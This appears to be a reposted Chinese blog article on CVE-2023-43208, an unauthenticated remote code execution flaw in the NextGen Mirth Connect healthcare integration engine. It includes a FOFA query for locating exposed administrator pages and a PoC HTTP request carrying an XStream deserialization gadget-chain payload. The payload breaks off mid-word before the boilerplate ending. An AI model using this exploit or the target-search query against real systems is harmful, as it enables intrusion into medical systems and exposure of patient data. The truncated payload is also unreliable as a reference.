本文主要是介绍NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
NextGen Mirth Connect是是美国NextGen公司的一个医疗集成引擎,主要用于医疗领域的系统集成和数据交换,支持多种协议和标准。
0x02 漏洞概述
NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。
0x03 影响范围
NextGen NextGen Mirth Connect < 4.4.1
0x04 复现环境
FOFA:title="Mirth Connect Administrator"
0x05 漏洞复现
PoC
POST /api/users HTTP/1.1
Host: your-ip
X-Requested-With: OpenAPI
Content-Type: application/xml<sorted-set><string>abcd</string><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler"><target class="org.apache.commons.collections4.functors.Chai
这篇关于NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!